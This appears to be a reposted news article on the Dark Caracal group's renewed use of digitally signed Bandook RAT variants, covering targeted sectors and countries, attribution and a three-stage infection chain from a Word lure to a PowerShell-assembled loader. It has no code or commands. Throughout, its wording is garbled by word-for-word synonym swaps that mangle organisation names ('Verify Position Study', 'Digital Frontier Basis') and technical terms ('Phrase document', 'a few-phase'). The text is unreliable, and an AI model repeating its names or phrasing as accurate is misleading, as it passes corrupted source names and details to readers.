Digitally Signed Bandook Malware Once Again Targets Multiple Sectors

  • A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of assaults versus a multitude of industries with a retooled version of a 13-calendar year-old backdoor Trojan.

    Verify Position Study referred to as out hackers affiliated with a team named Dark Caracal in a new report released yesterday for their initiatives to deploy “dozens of digitally signed variants” of the Bandook Windows Trojan in excess of the previous calendar year, hence at the time again “reigniting desire in this old malware family members.”

    The unique verticals singled out by the threat actor contain federal government, economical, vitality, food stuff business, health care, schooling, IT, and legal establishments situated in Chile, Cyprus, Germany, Indonesia, Italy, Singapore, Switzerland, Turkey, and the US.

    The unusually significant wide variety of targeted marketplaces and destinations “reinforces a earlier hypothesis that the malware is not created in-house and utilised by a one entity, but is aspect of an offensive infrastructure bought by a 3rd occasion to governments and threat actors throughout the world, to aid offensive cyber functions,” the scientists said.

    Dark Caracal’s substantial use of Bandook RAT to execute espionage on a global scale was initially documented by the Digital Frontier Basis (EFF) and Lookout in early 2018, with the group attributed to the theft of company mental assets and individually identifiable details from hundreds of victims spanning around 21 international locations.

    The prolific team, which has operated at minimum given that 2012, has been linked to the Lebanese General Directorate of General Security (GDGS), deeming it a country-condition degree highly developed persistent risk.

    The concurrent use of the exact same malware infrastructure by different teams for seemingly unrelated strategies led the EFF and Lookout to surmise that the APT actor “possibly uses or manages the infrastructure observed to be hosting a selection of widespread, worldwide cyberespionage strategies.”

    Now the similar team is back at it with a new strain of Bandook, with added initiatives to thwart detection and evaluation, per Check out Issue Analysis.

    A Three-Phase Infection Chain

    The an infection chain is a a few-phase method that starts with a entice Microsoft Word doc (e.g. “Certified paperwork.docx”) delivered inside a ZIP file that, when opened, downloads malicious macros, which subsequently proceeds to drop and execute a next-phase PowerShell script encrypted inside the primary Phrase document.

    In the previous phase of the attack, this PowerShell script is utilized to obtain encoded executable areas from cloud storage providers like Dropbox or Bitbucket in purchase to assemble the Bandook loader, which then normally takes the responsibility of injecting the RAT into a new Internet Explorer process.

    The Bandook RAT — commercially readily available starting off in 2007 — comes with all the abilities usually associated with backdoors in that it establishes get in touch with with a remotely-controlled server to get more instructions ranging from capturing screenshots to carrying out several file-similar operations.

    But in accordance to the cybersecurity organization, the new variant of Bandook is a slimmed-down model of the malware with help for only 11 commands, when prior versions had been recognised to function as several as 120 instructions, suggesting the operators’ drive to minimize the malware’s footprint and evade detection in opposition to significant-profile targets.

    That’s not all. Not only valid certificates issued by Certum were being utilised to signal this trimmed edition of the malware executable, Examine Stage researchers uncovered two more samples — entire-fledged digitally-signed and unsigned variants — which they imagine are operated and bought by a one entity.

    “Although not as capable, nor as practiced in operational security like some other offensive security providers, the team powering the infrastructure in these assaults looks to boost more than time, including many layers of security, valid certificates and other techniques, to hinder detection and examination of its functions,” the scientists concluded.

    Observed this short article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read additional distinctive content material we post.